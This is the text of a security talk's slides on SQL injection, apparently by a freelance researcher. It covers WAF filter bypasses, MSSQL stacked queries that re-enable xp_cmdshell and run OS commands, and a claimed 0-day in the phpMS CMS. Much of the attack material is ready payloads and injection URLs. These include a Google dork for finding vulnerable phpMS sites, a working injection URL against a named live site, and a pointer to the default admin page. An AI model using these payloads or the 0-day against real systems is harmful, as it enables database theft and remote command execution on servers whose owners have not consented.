Sql Injections With Real Life Scenarious

SQL INJECTIONS WITH REAL LIFE SCENARIOUS

By Francis Alexander

WHO AM I?

• Got Listed at ebay and Microsoft security Researchers List

• Worked as free lance security researcher for tech2.in.com and in.com

• Found SQLi vulnerabilities at kerala enterance portal website

• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982

• Basically the InfoSec Researcher Guy

AGENDA

Strictly waf based and Real Life Based Scenarious

MsSql Stack Based Queries(thought it as a good addon)

A PHP-MS 0-DAY

SQLI AN INTROFirst among the OWASP TOP 10 vulnerabilitiesUsed for gaining access to sql database and hence the b0x

Mainly of 5 types Union based Error based X-path based Blind and Time based Double Query based

PENTESTING SQLI IN REAL WORLDSo whats the catch here!!!Pentesting real life scenarious is much difficult than ever

Sqli has been patched and firewalls, IDS and IPS installed everywhere

Exploiting Sqli has been difficult and tools has disappointed to !

WHAT HAS KEPT US DULL Ofcourse Failure of Sqlmap !!!Failure of Havij which by the way is always a failure :p

IDS , IPS and other firewall familyApache security modules mod_sec,htmlentities,mysql_escape,magic_quotes and all my dear appsec modules

ADVANCED WAF BYPASSING TECHNIQUESWhat are they !!?Well we need to overcome the situation that has come rather than site and lament over it

Here will focusing on the real life scenarious where the tools fail and much of our human hard work comes in

BYPASSING FILTERSPreg_match is a comparer statement used in phpMainly deployed by small scale waf’sPoorly coded ones the easier an example

SQLI USING STORED PARAMETERSUsed when “select” + any case letters are blocked 'select'+'(A-Za-z)‘So any letter after select gets filtered outSolutionMysql has an option called stored variable procedure“@” is a sign that can be used as a prefix, that denotes stored procedure, function parameter names, and variables names.

So how do we do it?Union select 1,2,3 - - = 403 ForbiddenSo It changes to and (@:=version()) union select 1,@,3- - = bypassed

WHERE HAS THE ID=? DISAPPEARED So whats the Catch here Most of us love the dork inurl:php?id= site:blah.com So what has happened most admins have changed the id= parameters to within the url and making the tools go wreckless and n00bs go mad

An example would be the usuall way was site.com/index.php?id= ,now they have gone on and changed to site.com/index-goods-12.html

An example site that has no point of injection at the first sight

Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html

A FEW POINTS TO PONDERUsual commenting style should be followed here ie the “- -” other wise other forms like %23(#) and /* could cause the browser to misinterpret the statement as a comment hence commenting out the rest and not letting it read the .html part

In most cases encountered these type of injections, there are white spaces which often cause a havoc and nightmare for scanners

MESSING UP WITH WHITE SPACES Well dealing with white spaces depends on different scenarios

U could use the traditional commenting style like id=3/**/union/**/select 1,2,3 or Well the problem is /**/ might be filtered in some cases So we use the ()which is the same as executing the query id=(2)union(select(1),2,3) NB:During html based injections it is better to use the paranthesis

SQLI IN HTML TAGS Based on Error 1222 Came across CTF’s where the answer had to be in normal union based .

Most tools fails here since the vulnerable column is being parsed in between the html tags.

Usually union statements are being provided here but the columns do not get displayed.

So what do we do ? Plse don’t say we look over the source because ur not gonna find anything at the first shot

We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333

This helps us to search in the source but still nt available on screen.

If u could like to display it on screen u could useconcat or group_concat functions and using html inside them

Use hex of html if the quotes are blocked due to magic quotes

Here we could see the version on closing the “</title>” tag since the vulnerable column was being displayed within the title block

BYPASSING SOME COMMON ERRORS

Bypassing errors 400/403/404/406 //convert(group_concat(schema_name) using ascii) from information_schema.schemata - -

C-style Commenting : /*!Union*/+/*!Select*///apart from the original source commenting the ! Executes the command

Character Encoding :Bypasses filters like 400 %55nion/**/%53elect

Sub queries : Union (select 1,2,3) //Where most WAF’s fail out

id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a // # is comment but the %0A bypasses with the new line so the

statements gets executed

Bypassing Error 1064 Usually related with blocking of white spaces id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))

// the queries are supplied in parenthesis so as to forbid the use of white spaces “/**/ “Commenting also possible

Bypassing Error 500 and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+// WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.Give a large amount of data allows our code executing

INTRO TO MSSQL STACKED QUERIESStacked queries mainly available in mssql and postgresql servers

Underlying process is simple if chmdshell options are enable then u are in

Stacked Queries Support is Checked on Server using 'WAITFOR DELAY hour:min:sec’

For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or nt depending upon time lag.

RE-ENABLING XP.CMDSHELL IN CASE ITS DEAD? http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show

advanced options', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -

http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -

THE SITE CHECKED FOR PRIMARY ERRORS USING THE TRADITIONAL UNION SELECT STATEMENTS

Just to prove that still this exists a Real Life – demo

QUERY PARTYhttp://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--

// Creates the table funkyfresh http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -

// WE declare a variable @funky and store it with hex equi. Of the codeNOTE: 0x77686f616d69 => 'whoami‘

/!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))

// Creadits to Bernardo's original write-up from BlackHat

//The reason I took it although a bit complicated works for no reason

seamlessly Read the temp table to get the results and you need to make sure you deal with same data type when you do...

PHP-MS EXPLOIT 0-DAY 0-day by me phpMS - a free CMS (content management system), Designed for rapid development and support of web-projects of any complexity.

Features CMS phpMS: Easy to install; Multi-level menus; Arbitrary arrangement of blocks; Simple module development; Access rights

#GOOGLE DORK: INTEXT:COPYRIGHT©2005 PHPMSDemo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--

#By default 6 columns in most cases seen so could use this as default in sites discovered

#Finding the admin page of this makes it very easy to exploit # Default admin page is admin.php :-)Eg : http://www.site.com/admin.php :)

ANY QUESTIONS ?

References Couple of Blackhat talks and papers kaotickreations.blogspot.in (my blog) http://websec.wordpress.com/tag/sql-filter-evasion/